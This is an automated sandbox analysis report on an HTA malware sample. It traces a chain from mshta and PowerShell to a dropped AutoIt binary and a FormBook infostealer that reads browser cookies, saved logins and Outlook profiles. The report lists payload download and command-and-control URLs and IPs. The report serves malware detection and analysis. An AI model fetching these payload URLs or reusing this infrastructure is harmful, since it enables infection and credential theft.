Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\16822ced21b246d7b4efa95e473db719_1 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045\50477342285d4d88b6d64a863cefd7e7_1 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\255f161e87ba4d21a6493ad0a9d4d120_1 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\db49accb096a4f7abf1a6ef00d7f02f6_1 VolumeInformation Jump to behavior
Source: C:\Windows\System32\backgroundTaskHost.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\8569eaf60e24463091f9a00ca9cafffc_1 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A54E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00A54E87
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A61E06 GetUserNameW, 6_2_00A61E06
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A53F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 6_2_00A53F3A
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00A249A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2697502538.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2699158883.0000000005780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800345962.0000000003A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1799971563.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2695985493.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2697439176.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800824318.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2697537339.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: smss.exe Binary or memory string: WIN_81
Source: smss.exe Binary or memory string: WIN_XP
Source: smss.exe Binary or memory string: WIN_XPe
Source: smss.exe Binary or memory string: WIN_VISTA
Source: smss.exe Binary or memory string: WIN_7
Source: smss.exe Binary or memory string: WIN_8
Source: smss[1].exe.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2697502538.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2699158883.0000000005780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800345962.0000000003A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1799971563.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2695985493.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2697439176.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800824318.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2697537339.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 6_2_00A96283
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00A96747
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649248 Sample: givemebestthingsforgivemebest.hta Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 59 www.vczuahand.xyz 2->59 61 www.855696a.xyz 2->61 63 5 other IPs or domains 2->63 81 Suricata IDS alerts for network traffic 2->81 83 Antivirus detection for dropped file 2->83 85 Multi AV Scanner detection for dropped file 2->85 89 9 other signatures 2->89 13 mshta.exe 1 2->13         started        signatures3 87 Performs DNS queries to domains with low reputation 61->87 process4 signatures5 115 Suspicious command line found 13->115 117 PowerShell case anomaly found 13->117 16 cmd.exe 1 13->16         started        process6 signatures7 73 Detected Cobalt Strike Beacon 16->73 75 Suspicious powershell command line found 16->75 77 PowerShell case anomaly found 16->77 19 powershell.exe 43 16->19         started        24 conhost.exe 16->24         started        process8 dnsIp9 65 172.245.123.32, 49716, 80 AS-COLOCROSSINGUS United States 19->65 51 C:\Users\user\AppData\Roaming\smss.exe, PE32 19->51 dropped 53 C:\Users\user\AppData\Local\...\smss[1].exe, PE32 19->53 dropped 55 C:\Users\user\AppData\...\y35p2qjs.cmdline, Unicode 19->55 dropped 91 Drops PE files with benign system names 19->91 93 Loading BitLocker PowerShell Module 19->93 95 Powershell drops PE file 19->95 26 smss.exe 2 19->26         started        29 csc.exe 3 19->29         started        32 backgroundTaskHost.exe 27 24 19->32         started        file10 signatures11 process12 file13 99 Antivirus detection for dropped file 26->99 101 Multi AV Scanner detection for dropped file 26->101 103 Binary is likely a compiled AutoIt script file 26->103 105 3 other signatures 26->105 34 svchost.exe 26->34         started        57 C:\Users\user\AppData\Local\...\y35p2qjs.dll, PE32 29->57 dropped 37 cvtres.exe 1 29->37         started        signatures14 process15 signatures16 79 Maps a DLL or memory area into another process 34->79 39 7HLXbJFcuuGutQgrmx.exe 34->39 injected process17 signatures18 97 Found direct / indirect Syscall (likely to bypass EDR) 39->97 42 AtBroker.exe 13 39->42         started        process19 signatures20 107 Tries to steal Mail credentials (via file / registry access) 42->107 109 Tries to harvest and steal browser information (history, passwords, etc) 42->109 111 Modifies the context of a thread in another process (thread injection) 42->111 113 3 other signatures 42->113 45 7HLXbJFcuuGutQgrmx.exe 42->45 injected 49 firefox.exe 42->49         started        process21 dnsIp22 67 www.soportemx-findmy.click 198.58.118.167, 49732, 49734, 49735 LINODE-APLinodeLLCUS United States 45->67 69 ns195.l4y.cn 45.119.52.125, 49745, 49746, 49747 CLOUDIE-AS-APCloudieLimitedHK China 45->69 71 4 other IPs or domains 45->71 119 Found direct / indirect Syscall (likely to bypass EDR) 45->119 signatures23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
75.2.103.23
 www.thykingdomwear.store United States
16509 AMAZON-02US false
149.104.1.185
 www.worrr37.yachts United States
174 COGENT-174US false
76.223.54.146
 www.vczuahand.xyz United States
16509 AMAZON-02US true
45.119.52.125
 ns195.l4y.cn China
55933 CLOUDIE-AS-APCloudieLimitedHK true
52.223.13.41
 www.blackhat.chat United States
8987 AMAZONEXPANSIONGB false
172.245.123.32
 unknown United States
36352 AS-COLOCROSSINGUS true
198.58.118.167
 www.soportemx-findmy.click United States
63949 LINODE-APLinodeLLCUS true

Contacted Domains

Name IP Active
www.worrr37.yachts 149.104.1.185 true
ns195.l4y.cn 45.119.52.125 true
www.vczuahand.xyz 76.223.54.146 true
www.soportemx-findmy.click 198.58.118.167 true
www.blackhat.chat 52.223.13.41 true
www.thykingdomwear.store 75.2.103.23 true
www.855696a.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.855696a.xyz/q86a/ true
  • Avira URL Cloud: safe
 unknown
http://172.245.123.32/70/smss.exe true
  • Avira URL Cloud: safe
 unknown
http://www.soportemx-findmy.click/ma0g/ true
  • Avira URL Cloud: safe
 unknown
http://www.worrr37.yachts/1imc/ true
  • Avira URL Cloud: safe
 unknown
http://www.worrr37.yachts/1imc/?DjqdfNk=GkZ+7lZN5ZbT6rZBuZ+pskfJL+6uT56R2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHhd+DXQfhkENwgiz5+jrub82ItCLB/EMlgTjPlwiCI2nY+w==&fNeX=nNpDjLP true
  • Avira URL Cloud: safe
 unknown
http://www.blackhat.chat/04r3/ true
  • Avira URL Cloud: safe
 unknown
http://www.soportemx-findmy.click/ma0g/?DjqdfNk=H2S90RmziCMvLCuL5yTkJF203ndQbU/T+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqi+1gs/5BxCzY4CtYzWb39E9UovJPnlwKJarvBRzz8eyTcw==&fNeX=nNpDjLP true
  • Avira URL Cloud: safe
 unknown
http://www.thykingdomwear.store/d4kl/?DjqdfNk=6y/7tod/VF/KHUQqfM/wfVXibkdmZeeslXhDnWhvAY/z/yk3pdRRAQekYBjFWPUzPUKr4nIOcHvctiu99XDhEDhTzejKR0AKl6+T/G5w3q1KIwX/LqFItooehhCIycehmA==&fNeX=nNpDjLP true
  • Avira URL Cloud: safe
 unknown
http://www.855696a.xyz/q86a/?DjqdfNk=1RS/DLESjC/mKKX9C/bcN2l/5Bt+ZmCCo7MGFq+OZJ2Pg2HsdXdlDjVOv2U28y6Xqr87siUnw8FG4MQCr+RpXrpLY0pe8E1oH/6FSjr22gQjBdPmae5AdSMbv8VH/OtMXA==&fNeX=nNpDjLP true
  • Avira URL Cloud: safe
 unknown
http://www.vczuahand.xyz/lvz4/ true
  • Avira URL Cloud: safe
 unknown
http://www.blackhat.chat/04r3/?DjqdfNk=n6ptdLvBCapBX+1eOVrY57v3fry5rNe0wfWRjljnFiAjsKOl5dK99Lywx+Nqo77d2RcdyHveJO2lBX31lOnFlf4SmZDL+ssCij03tKgdKaReZJPMIs0OS1RV9JnQRCS0ZQ==&fNeX=nNpDjLP true
  • Avira URL Cloud: safe
 unknown